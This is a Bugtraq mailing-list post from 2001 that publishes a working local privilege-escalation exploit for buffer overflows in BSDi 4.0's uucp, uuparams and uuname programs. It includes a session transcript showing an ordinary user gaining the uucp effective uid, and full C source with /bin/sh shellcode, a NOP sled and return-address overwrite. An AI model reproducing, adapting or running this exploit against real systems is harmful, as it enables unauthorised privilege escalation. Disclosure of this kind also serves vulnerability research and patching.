(BSDi/4.0-specific)uucp family exploit. (uucp/uuparams/uuname)
Date: 3 Dec 2001 03:34:27 -0000
From: Vade 79 <v9@fakehalo.deadpig.org>
To: bugtraq@securityfocus.com
Subject: (BSDi/4.0-specific)uucp family exploit. (uucp/uuparams/uuname)
-- usage start --
bash-2.02$ id
uid=123(t) gid=100(user) groups=100(user)
bash-2.02$ cc bsdi_uucp.c -o bsdi_uucp
bash-2.02$ ./bsdi_uucp -uuparams
[ (BSDi/4.0)uucp*[]: family buffer overflow, by:
v9@fakehalo.deadpig.org. ]
*** [data]: return address: 0x80474, program:
/usr/sbin/uuparams.
$ id
uid=123(t) euid=6(uucp) gid=100(user) egid=6(uucp)
groups=6(uucp), 100(user)
$
-- usage end --
-- bsdi_uucp.c start --
/* (BSDi)uucp[] family buffer overflow. by:
v9@fakehalo.deadpig.org. this yields
euid/egid/group=6(uucp) on BSDi/4.0
systems. (BSDi specific exploit)
*/
#define UUCP "/usr/bin/uucp"
#define UUPARAMS "/usr/sbin/uuparams"
#define UUNAME "/usr/bin/uuname"
#define FILLER "x"
static char exec[]=
"\xeb\x1f\x5e\x31\xc0\x89\x46\xf5\x88\x46"
"\xfa\x89\x46\x0c\x89\x76\x08\x50\x8d\x5e"
"\x08\x53\x56\x56\xb0\x3b\x9a\xff\xff\xff"
"\xff\x07\xff\xe8\xdc\xff\xff\xff\x2f\x62"
"\x69\x6e\x2f\x73\x68\x00"; /* 46 chars. */
void usage(char *progname){
printf("*** [syntax]: %s <-uucp|-uuparams|"
"-uuname>\n",progname);
exit(1);
}
long pointer(void){__asm__("movl %esp,%eax");}
int main(int ac,char **av){
unsigned short type=0;
unsigned int i=0;
long ret;
char eip[1024],buf[4096];
char *progptr;
printf("[ (BSDi/4.0)uucp*[]: family buffer o"
"verflow, by: v9@fakehalo.deadpig.org. ]\n");
if(ac>1){
if(!strncasecmp(av[1],"-uucp",5)){
progptr=UUCP;
type=1;
}
else if(!strncasecmp(av[1],"-uuparams",9)){
progptr=UUPARAMS;
type=0;
}
else if(!strncasecmp(av[1],"-uuname",7)){
progptr=UUNAME;
type=0;
}
else
usage(av[0]);
}
else
usage(av[0]);
ret=(pointer()+sizeof(buf));
eip[0]=0x01;eip[1]=0x01;eip[2]=0x01;
for(i=3;i<1024;i+=4){*(long *)&eip[i]=ret;}
eip[i]=0x0;for(i=0;i<(sizeof(buf)-
strlen(exec)-strlen(eip));i++){*(buf+i)=0x90;}
memcpy(buf+i,exec,strlen(exec));
memcpy(buf,"EXEC=",5);putenv(buf);
printf("*** [data]: return address: 0x%lx, p"
"rogram: %s.\n",ret,progptr);
if(execl(progptr,progptr,FILLER,
(type?FILLER:eip),(type?eip:0),0)){
printf("*** [error]: could not execute %s s"
"uccessfully.\n",progptr);
exit(1);
}
exit(0);
}
-- bsdi_uucp.c end --
Vade79 -> v9@fakehalo.deadpig.org ->
fakehalo.deadpig.org
